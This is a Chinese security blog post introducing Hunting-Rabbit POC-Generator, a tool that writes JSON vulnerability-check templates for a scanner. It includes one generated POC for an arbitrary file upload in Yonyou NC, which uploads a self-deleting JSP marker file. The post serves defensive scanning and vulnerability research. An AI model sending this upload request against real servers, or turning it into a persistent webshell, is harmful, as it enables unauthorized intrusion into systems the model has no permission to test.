Hunting-Rabbit系列四:POC-Generator

admin
admin
admin
138655
文章
114
评论
2024年6月20日19:18:05评论20 views字数 2022阅读6分44秒阅读模式

前言

Hunting-Rabbit(猎兔):致力于打造渗透测试全流程命令行工具,细化每个过程,让渗透测试的每个过程都看得见摸得着,防止遗漏资产,误报严重而丢失漏洞,同时源码很基础,对初学者有重要参考意义。

简介

本项目为 Hunting-Rabbit 系列项目之一 ,是Hunting-Rabbit-VulScanner 专属POC生成器,致力于最直观简洁的POC编写。

Hunting-Rabbit-VulScanner拥有足够多POC后,再进行发布,欢迎各位使用该工具贡献。当前仅有54个,仓库地址如下:

https://github.com/langsasec/Hunting-Rabbit-POC

项目地址

Github:

https://github.com/langsasec/Hunting-Rabbit-POC-Generator

Gitee:
https://gitee.com/langsasec/Hunting-Rabbit-POC-Generator

截图/演示

Hunting-Rabbit系列四:POC-Generator

生成的POC如下:

Hunting-Rabbit系列四:POC-Generator

{
    "vul_name""用友 NC avatar 任意文件上传",
    "level""高危",
    "description""用友 NC acatar接口存在任意文件上传漏洞,可上传恶意脚本至服务器。",
    "product""用友 NC",
    "version""用友 NC",
    "cve""无",
    "reference""https://mp.weixin.qq.com/s/SS_KVTcomHmWbP5zEvVyMw",
    "fixing""https://blog.csdn.net/qq_36618918/article/details/137913219n1、升级到安全版本n 2、如非必要,禁止公网访问该系统。n 3、设置白名单访问。",
    "rule": {
        "path""/uapim/upload/avatar?usercode=qbll&fileType=jsp",
        "method""GET",
        "headers""User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36nConnection: closenContent-Length: 242nAccept-Encoding: gzip, deflate, brnContent-Type: multipart/form-data; boundary=----v6bavojmqudas7g0al2o",
        "body""------v6bavojmqudas7g0al2onContent-Disposition: form-data; name="uploadedfile"; filename="klywwjrrux.jsp"nn<%out.print("lmnpl");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>n------v6bavojmqudas7g0al2o--",
        "status_code""200",
        "keywords""true",
        "res_time"""
    },
    "operator": {
        "author""浪飒",
        "email""[email protected]",
        "github""https://github.com/langsasec"
    }
}

安装和使用

1.拉取代码:

git clone https://github.com/langsasec/Hunting-Rabbit-POC-Generator

2.安装依赖

cd Hunting-Rabbit-POC-Generator && pip install -r requirements.txt

3.Python3运行

python Hunting-Rabbit-POC-Generator.py

4.运行后会生成config.ini配置文件,内容如下,可自行配置

# 请勿删除此行,这是为了用户填写联系信息,你将是POC的贡献者,方便其他用户使用POC时可以互相联系,也可以不填写
Author= 你的名字
Email=邮箱
GitHub=Github地址

原文始发于微信公众号(浪飒sec):Hunting-Rabbit系列四:POC-Generator

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月20日19:18:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hunting-Rabbit系列四:POC-Generatorhttps://cn-sec.com/archives/2867317.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息